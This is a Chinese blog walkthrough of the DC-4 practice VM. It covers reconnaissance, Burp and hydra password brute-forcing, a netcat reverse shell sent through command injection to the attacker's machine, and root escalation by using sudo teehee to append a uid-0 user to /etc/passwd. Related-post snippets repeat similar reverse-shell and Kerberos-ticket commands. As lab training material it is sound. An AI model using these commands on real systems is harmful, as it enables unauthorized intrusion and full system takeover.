【DC4靶场通关详细记录】

已于 2023-12-17 18:57:20 修改
阅读量1k 收藏 20
点赞数 19
分类专栏: DC靶场通关记录系列 文章标签: 网络安全 web安全 笔记 计算机网络 经验分享 安全 学习方法
于 2023-12-17 18:56:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135047961
版权

DC4靶场通关记录

搭建环境

  1. 直接虚拟机导入DC4靶场即可,如果报错直接重试;
  2. 设置kali于DC4靶场的网络连接为统一方式;
  3. 同时说明一下DC4靶场同DC3靶场相同,都只有一个flag。

信息收集

确定目标IP

使用arp-scan进行扫描,排除所有已知的IP,确定目标靶机的IP,使用以下命令

arp-scan -l

image.png

确定目标端口及服务

使用nmap对靶机进行扫描,确定靶机开放端口,以及端口提供的服务,使用以下命令

nmap -sC -sV -p- -A 192.168.223.130

image.png
根据扫描结果可知

  • 该靶机开放了22和80两个端口
  • 22端口提供了ssh服务
  • 80端口提供了http服务

指纹识别

使用whatweb对靶场进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png
根据扫描的结果,发现并没有得到关于的CMS信息。

目录爆破

使用dirb对靶机进行目录爆破,扫描敏感目录,使用以下命令

dirb http://192.168.223.130

image.png
根据扫描的结果,得到相关敏感目录

  • http://192.168.223.130/css/
  • http://192.168.223.130/images/
  • http://192.168.223.130/index.php
  • http://192.168.223.130/css

获取shell

burp密码爆破

  1. 根据信息收集内容,靶机有http服务,尝试访问靶机IP
  2. 访问靶机IP成功,是网站登录页面,尝试输入随机的用户名密码测试,无报错信息,则使用burp抓包尝试密码爆破

image.png

  1. 设置浏览器的代理为burp的代理,并burp开启拦截,网站重新提交登录信息
  2. burp抓到登录信息,将抓到的数据报发送到Intruder模块中

image.png

  1. 在数据包中添加payload位

image.png

  1. 设置payload,添加密码字典尝试攻击

image.png

  1. 同时再发送一个数据包到Intruder中,先选择集束炸弹的攻击类型,同时设置用户名或密码两个payload位置,指定用户名和密码字典后进行攻击。再次设置攻击是由于不确定用户名,并提高破解效率
  2. 一个payload位的优先攻击结束,进行查看,根据长度,请求判断出happy是密码

image.png

  1. 尝试使用该密码,登陆成功

admin:happy

使用AWVS扫描器进行扫描

  1. 设置IP目标,录制登录脚本,进行扫描
  2. 扫描结果中有两个高危漏洞:

image.png

  1. 查看高危漏洞

image.png

  1. 两个高危漏洞的url都一样,登陆成功后的点击按钮跳转后的页面的url与之相同

image.png

利用命令执行漏洞获得shell

  1. 尝试抓包更改请求数据包,使用nc形成一个反弹shell,使用以下命令

nc -c /bin/bash 192.168.223.129 8888

image.png

  1. 在kail上开启监听,使用以下命令

nc -lvp 8888

  1. 开启监听后放行请求数据包,获得反弹shell

image.png

提权操作

获取ssh服务的账号密码

尝试提权发现jim的密码文件

  1. 使用python获得交互性shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

  1. 查看当前权限,以及当前目录

whoami
pwd

  1. 查找具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

image.png

  1. 查看特殊的文件,是jim用户的权限,剩余一个是目录,另一个无权限

/home/jim/test.sh

image.png

  1. 进入目录查看,有一个密码备份文件,查看备份内容并将内容复制保存到文档内

image.png

  1. 尝试使用hydra进行ssh密码破解

hydra -l jim -P jp 192.168.223.130 ssh

image.png
通过密码破解得知:

jim:jibril04

登陆ssh进行提权

  1. 登陆ssh

ssh jim@192.168.223.130
输入密码

  1. 查看当前权限,以及当前目录

whoami
pwd

  1. 进入刚才那个特殊文件的位置

cd /home/jim

  1. 查看刚刚没权限查看的文件,是一封邮件

cat mbox

image.png

  1. 查找相关的文件

find / -name “*mail*” 2>/dev/null
输出文件太多,先使用以下命令
find / -name “mail” 2>/dev/null

image.png

  1. 对这四个文件依次查看,发现/var/mail中有两个文件,依次查看后
  2. 其中的jim文件是一份邮件,有用户名和密码,可能是ssh的用户

image.png

  1. 尝试切换用户

image.png

sudo使用teehee提权

  1. 尝试查看是否有sudo提权方法

sudo -l

image.png

  1. 使用teehee提权
  1. echo “ligth:$(openssl passwd light):0:0:/home:/bin/bash” | sudo teehee -a /etc/passwd
  2. su light

image.png

flag

  1. 进入root下,查看flag

cd /root
ls
cat flag.txt

image.png

总结

  1. 扫描器AWVS的使用
  2. 命令执行漏洞的利用:使用反弹shell命令获取webshell
  3. 使用hydra爆ssh的用户名和密码: hydra -l 用户名 -P 密码字典 ip ssh
  4. sudo提权teehee提权方法:
1. echo "ligth:$(openssl passwd light):0:0:/home:/bin/bash" | sudo teehee -a /etc/passwd
2. su light
榕小树
关注
  • 19
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
DC4靶场
m0_62438849的博客
03-09 858
例如,网站可能是由静态文件组成,不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型,并可以以不同的方式自定义每种负载类型。Payload type(负载类型):较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”,指的是仅是这个用户无法使用bash或者其他shell来登录系统而已,并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin,此时无法登录系统,即时给了密码也不行。
DC4靶场练习
qq_60848021的博客
06-24 60
思路:在www-data用户上,我先是查看了SUID提权,发现了/home/jim/test.sh这个文件具有SUID权限,试着用这个文件提权,但是www-data用户并没有/bin/sh 和/bin/bash。后来在参考了别人的笔记,在ssh登录jim成功时,有一封邮件我并没有注意到,查看了该邮件里面有charles用户的密码,切换到charles用户,使用sudo -l命令查询,发现/usr/bin/teehee文件具有sudo权限,可以进行提权。1,登录成功以后,页面是3个命令显示。
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1365
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
【DC-4靶场渗透】
一纸荒芜的博客
07-04 1920
DC-4渗透
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4215
dc-4靶场详细渗透过程
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1005
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1547
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4393
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 303
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
DC-4靶场实战
qq_42754807的博客
03-30 743
DC-4靶场实战
DC4靶场渗透流程(超详细)
m0_64583632的博客
04-10 712
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标
Vulnhub靶场----4、DC-4
七天
02-22 885
Vulnhub-DC4
靶场DC-4
好好学习
11-28 690
每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!针对DC系列的靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。
对DC-4靶机进行渗透测试
zll___的博客
03-14 426
对DC-4靶机进行渗透测试
ssti-lab靶场通关
09-02
通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值